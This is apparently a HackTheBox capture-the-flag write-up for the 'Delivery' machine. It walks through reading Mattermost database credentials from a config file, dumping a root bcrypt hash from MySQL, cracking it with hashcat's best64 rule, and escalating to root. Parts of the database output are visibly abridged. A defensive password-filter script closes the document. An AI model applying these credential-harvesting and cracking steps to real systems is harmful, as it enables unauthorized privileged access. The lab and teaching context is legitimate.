HashCat: Rules Type Base64
Author: anonputraid

INTRO
HackTheBox Delivery is an easy-difficulty box whose machine matrix leans towards custom exploitation. The vulnerable application on the machine is Mattermost. Exploitation covers MySQL: Useful Resources, MySQL: Sorting Result, MySQL: Select Query, and cracking the password using HashCat: Rules Type Base64.
CTF
Custom Exploit
Enumeration
Hacking Tools:
nmap
hashcat
NMAP SCAN
Open ports :
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
Add the machine's domain and IP to /etc/hosts:
sudo nano /etc/hosts
10.10.10.222 delivery.htb helpdesk.delivery.htb
ENUMERATION
ssh [email protected]
Password: Youve_G0t_Mail!
Output:
maildeliverer@Delivery:~$
PRIVILEGE ESCALATION
Create Rule Wordlists
echo -n "PleaseSubscribe!" > rule
Find Mattermost Folder
cd /tmp && find / -name "mattermost*" > save.txt
cat save.txt
Output :
/opt/mattermost/config
cd /opt/mattermost/config
cat config.json
Output:
"DataSource":"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s
Hash Pass Root
mysql -h localhost -u mmuser -pCrack_The_MM_Admin_PW
Output
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> show tables;
Output:
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Users |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> desc Users;
Output:
+--------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Username | varchar(64) | YES | UNI | NULL | |
| Password | varchar(128) | YES | | NULL | |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)
MariaDB [mattermost]> select Username,Password from Users;
Output:
+--------------+--------------------------------------------------------------+
| Username | Password |
+----------------------------------+------------------------------------------+
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------------------------------+------------------------------------------+
19 rows in set (0.000 sec)
Create File In Local Server :
# single quotes keep the shell from expanding $2a, $10 and $VM6E... as variables
echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hashroot.txt
HashCat Rule
$ ls -la /usr/share/hashcat/rules
Output:
-rw-r--r-- 1 root root 933 Jul 31 20:09 best64.rule
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout rule > wordlists.txt
wc -l wordlists.txt
Output:
77 wordlists.txt
hashcat -m 3200 -a 0 hashroot.txt wordlists.txt
Output:
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Root
su root
Password: PleaseSubscribe!21
Output
maildeliverer@Delivery:~$ su root
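The root password fell because it was a known phrase with two digits appended, which the 77 rule-generated candidates covered. As an added example (not part of the original writeup), here is a password-change filter that rejects such derivatives. The deny-list contents, the function names and the set of manglings undone are assumptions, and it does not reimplement best64.rule.

```python
# Added example: reject new passwords that are simple manglings of a known phrase.
# BANNED_BASES is a constructed deny-list; a real one would hold phrases already
# exposed in tickets, chat or documentation.
BANNED_BASES = ["PleaseSubscribe!"]

# Common character substitutions, folded back to letters before comparing.
LEET = str.maketrans("013457@$", "oleastas")


def canon(s):
    """Case-fold and undo leet substitutions so 'Pl3ase' and 'please' compare equal."""
    return s.lower().translate(LEET)


def variants(pw, max_affix=3):
    """Return pw with reversal, duplication and short prefixes/suffixes undone."""
    forms = {pw, pw[::-1]}
    half = len(pw) // 2
    if len(pw) % 2 == 0 and pw[:half] == pw[half:]:
        forms.add(pw[:half])              # "wordword" -> "word"
    for f in list(forms):
        for n in range(1, max_affix + 1):
            if len(f) > n:
                forms.add(f[:-n])         # strip an appended suffix, e.g. "21"
                forms.add(f[n:])          # strip a prepended prefix
    return forms


def derived_from_banned(pw, banned=BANNED_BASES):
    """Return the banned base that pw is derived from, or None if it is unrelated."""
    targets = {canon(b): b for b in banned}
    for v in variants(pw):
        hit = targets.get(canon(v))
        if hit is not None:
            return hit
    return None


if __name__ == "__main__":
    # Constructed sample inputs.
    for candidate in ["PleaseSubscribe!21", "pl3as3subscrib3!7", "tidal-Orbit-quartz-88"]:
        base = derived_from_banned(candidate)
        print(candidate, "->", "REJECT (derived from %r)" % base if base else "ok")
```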